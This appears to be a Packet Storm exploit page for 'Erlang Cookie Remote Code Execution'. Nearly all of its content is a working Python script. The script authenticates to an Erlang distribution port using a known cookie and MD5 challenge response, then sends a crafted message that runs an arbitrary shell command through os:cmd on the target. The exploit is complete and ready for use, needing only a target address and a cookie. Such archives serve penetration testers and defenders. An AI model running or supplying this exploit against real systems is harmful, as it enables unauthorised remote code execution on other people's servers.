exploit the possibilities

Erlang Cookie Remote Code Execution

Erlang Cookie Remote Code Execution
Posted Jan 13, 2021
Authored by 1F98D

Erlang makes use of a cookie that can be leveraged to achieve remote code execution.

tags | exploit, remote, code execution
MD5 | f0614ff7536574d91d20ea97b35c5f74

Erlang Cookie Remote Code Execution

Change Mirror Download
# Exploit Title: Erlang Cookie - Remote Code Execution
# Date: 2020-05-04
# Exploit Author: 1F98D
# Original Author: Milton Valencia (wetw0rk)
# Software Link: https://www.erlang.org/
# Version: N/A
# Tested on: Debian 9.11 (x64)
# References:
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
#
# Erlang allows distributed Erlang instances to connect and remotely execute commands.
# Nodes are permitted to connect to eachother if they share an authentication cookie,
# this cookie is commonly called ".erlang.cookie"
#
#!/usr/local/bin/python3

import socket
from hashlib import md5
import struct
import sys

TARGET = "192.168.1.1"
PORT = 25672
COOKIE = "XXXXXXXXXXXXXXXXXXXX"
CMD = "whoami"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))

name_msg = b"\x00"
name_msg += b"\x15"
name_msg += b"n"
name_msg += b"\x00\x07"
name_msg += b"\x00\x03\x49\x9c"
name_msg += b"AAAAAA@AAAAAAA"

s.send(name_msg)
s.recv(5) # Receive "ok" message
challenge = s.recv(1024) # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]

print("Extracted challenge: {}".format(challenge))

challenge_reply = b"\x00\x15"
challenge_reply += b"r"
challenge_reply += b"\x01\x02\x03\x04"
challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()

s.send(challenge_reply)
challenge_res = s.recv(1024)
if len(challenge_res) == 0:
print("Authentication failed, exiting")
sys.exit(1)

print("Authentication successful")

ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
msg += struct.pack(">H", len(CMD))
msg += bytes(CMD, 'ascii')
msg += b'jw\x04user'

payload = b'\x70' + ctrl + msg
payload = struct.pack('!I', len(payload)) + payload
print("Sending cmd: '{}'".format(CMD))
s.send(payload)
print(s.recv(1024))

Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close